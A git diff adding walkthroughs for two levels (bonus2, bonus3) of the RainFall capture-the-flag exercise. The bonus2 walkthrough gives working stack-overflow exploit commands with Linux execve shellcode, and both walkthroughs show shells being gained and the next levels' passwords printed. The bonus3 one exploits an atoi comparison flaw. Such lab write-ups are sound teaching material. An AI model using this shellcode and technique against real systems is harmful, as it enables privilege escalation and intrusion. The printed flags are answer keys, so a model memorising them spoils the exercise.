diff --git a/bonus2/Ressources/walkthrough.md b/bonus2/Ressources/walkthrough.md
new file mode 100644
index 0000000..aefa27c
--- /dev/null
+++ b/bonus2/Ressources/walkthrough.md
@@ -0,0 +1,40 @@
+Using ghidra we notice LANG env variable is exploited and can be either fi, nl, or something else, defaulting to english. It calls a greeting function and uses both arguments. We'll set it to nl for now.
+
+Fiddling a bit we can make the program segfault, and can make it segfault at any address
+
+```
+Starting program: /home/user/bonus2/bonus2 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAAAAAA aaaaaaaaaaaaaaaaaaaaaaaXXXX
+Goedemiddag! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaaaaaaaaaaaaaaaaaaaaaaaXXXX
+
+Program received signal SIGSEGV, Segmentation fault.
+0x58585858 in ?? ()
+(gdb)
+```
+
+let's try to put a shellcode after the x.
+
+We find the argv in the stack at address 0xbffff8c0.
+
+our 'X's are at address 0xbffff919.
+let's put our shellcode at 0xbffff920. That's 3 characters between the addresses and the shellcode.
+
+it makes a strange behavior but doesn't work.
+
+```
+bonus2@RainFall:~$ LANG=nl /home/user/bonus2/bonus2 `python -c "print('A'*40)"` `python -c "print('a'*23+'\x20\xf9\xff\xbf'+'a'*3+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68')"`
+bonus2@RainFall:~$
+```
+
+let's try putting the shellcode in the first argument
+
+
+```
+bonus2@RainFall:~$ LANG=nl /home/user/bonus2/bonus2 `python -c "print('\x90'*100+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68')"` `python -c "print('a'*23+'\xe0\xf8\xff\xbf')"`
+Goedemiddag! ����������������������������������������aaaaaaaaaaaaaaaaaaaaaaa����
+$ whoami
+bonus3
+$ cat /home/user/bonus3/.pass
+71d449df0f960b36e0055eb58c14d0f5d0ddc0b35328d657f91cf0df15910587
+```
+
+:)
diff --git a/bonus3/Ressources/walkthrough.md b/bonus3/Ressources/walkthrough.md
new file mode 100644
index 0000000..4f1e23a
--- /dev/null
+++ b/bonus3/Ressources/walkthrough.md
@@ -0,0 +1,22 @@
+We compare characters of argv[1] the string of the last flag.
+
+But the string of the flag is shortened depending on the value of atoi(argv[1]). If we enter 14, the 14th characters is replaced by a zero.
+
+So maybe we can put a 0, so the string of last flag becomes an empty string.
+
+But then we are comparing "0\0" with "\0", which isn't equal.
+
+Fortunately, atoi on an empty string also returns 0.
+
+```
+bonus3@RainFall:~$ ./bonus3 ""
+$ whoami
+end
+$ cat /home/user/end/.pass
+3321b6f81659f9a71c76616f606e4b50189cecfea611393d5d649f75e157353c
+$ cd /home/user/end 
+$ cat end
+Congratulations graduate!
+```
+
+:)